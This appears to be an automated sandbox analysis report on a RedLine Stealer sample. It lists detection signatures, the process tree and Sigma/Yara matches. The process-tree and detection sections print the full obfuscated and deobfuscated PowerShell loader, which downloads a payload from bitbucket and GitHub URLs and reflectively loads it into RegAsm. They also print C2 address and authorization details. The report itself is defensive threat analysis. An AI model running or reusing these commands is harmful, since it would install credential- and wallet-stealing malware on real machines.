Windows Analysis Report
sRMytgfRpJ.exe

Overview

General Information

Sample name: sRMytgfRpJ.exe (renamed because the original name is a hash value)
Original sample name: 51c009abf871216f8d9e40cdd785ce6c.exe
Analysis ID: 1519351
MD5: 51c009abf871216f8d9e40cdd785ce6c
SHA1: 54bb04f21150f5706a3171847d3de9851cafcccf
SHA256: 9754bc10564077425803459cc91b0197ad96263e6994e9afc2a5fd0e932615d8
Tags: exe, user-abuse_ch

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected RedLine Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops certificate files (DER)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • sRMytgfRpJ.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\sRMytgfRpJ.exe" MD5: 51C009ABF871216F8D9E40CDD785CE6C)
    • cmd.exe (PID: 7352 cmdline: cmd.exe /c fqt.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7428 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwB
l#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##
n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#DU#MgBs#Gk#dw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • RegAsm.exe (PID: 8044 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is malware sold on underground forums, apparently either as a standalone purchase ($100/$150 depending on the version) or on a subscription basis ($100/month). It harvests information from browsers such as saved credentials, autocomplete data, and credit card information. It also takes a system inventory of the target machine, including the username, location data, hardware configuration, and details of installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and the malware can upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "185.196.9.26:6302", "Bot Id": "@dxrkl0rd", "Authorization Header": "9c8dd7353be7ed4b6832da21d8d0d902"}
Source: dump.pcap; Rule: JoeSecurity_RedLine_1; Description: Yara detected RedLine Stealer; Author: Joe Security
Source: dump.pcap; Rule: JoeSecurity_RedLine; Description: Yara detected RedLine Stealer; Author: Joe Security
Source: 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_RedLine; Description: Yara detected RedLine Stealer; Author: Joe Security
Source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_RedLine; Description: Yara detected RedLine Stealer; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7476; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7476; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
  • 0x44ec6:$b2: ::FromBase64String(
  • 0x44cd7:$b3: ::UTF8.GetString(
  • 0x1a8b7:$s1: -join
  • 0x2a8b3:$s1: -join
  • 0x4aa16:$s3: reverse
  • 0x52180:$s3: reverse
  • 0x87500:$s3: reverse
  • 0x8e155:$s3: reverse
  • 0x9013c:$s3: reverse
  • 0x9b16b:$s3: reverse
  • 0xa31df:$s3: reverse
  • 0xa34cd:$s3: reverse
  • 0xa3be7:$s3: reverse
  • 0xa43a0:$s3: reverse
  • 0xab48b:$s3: reverse
  • 0xab8a5:$s3: reverse
  • 0xac42d:$s3: reverse
  • 0xad0da:$s3: reverse
  • 0xc6895:$s3: reverse
  • 0xd20d3:$s3: reverse
  • 0x1cbd4:$s4: +=
Source: 10.2.RegAsm.exe.400000.0.unpack; Rule: JoeSecurity_RedLine; Description: Yara detected RedLine Stealer; Author: Joe Security
Source: amsi64_7664.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security

Spreading

Source: Process started. Author: Joe Security. Data: Command: the deobfuscated PowerShell download-and-load command line of powershell.exe PID 7664, reproduced in full in the process tree above.

System Summary

Source: Process started. Author: Florian Roth (Nextron Systems). Data: Command: the Base64-obfuscated $codigo PowerShell command line of powershell.exe PID 7476, reproduced in full in the process tree above.
Source: Process started. Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton. Data: Command: the deobfuscated PowerShell download-and-load command line of powershell.exe PID 7664, reproduced in full in the process tree above.
Source: Process started. Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems). Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fqt.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs", ProcessId: 7428, ProcessName: wscript.exe
Source: Process started. Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton. Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fqt.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs", ProcessId: 7428, ProcessName: wscript.exe
Source: Process started. Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community. Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fqt.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs", ProcessId: 7428, ProcessName: wscript.exe
Source: Registry Key set. Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split). Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\sRMytgfRpJ.exe, ProcessId: 7328, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
Source: Process started. Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger. Data: Command: the deobfuscated PowerShell download-and-load command line of powershell.exe PID 7664, reproduced in full in the process tree above.
                  Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fqt.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" , ProcessId: 7428, ProcessName: wscript.exe
                  Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#Z

                  Data Obfuscation

                  Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 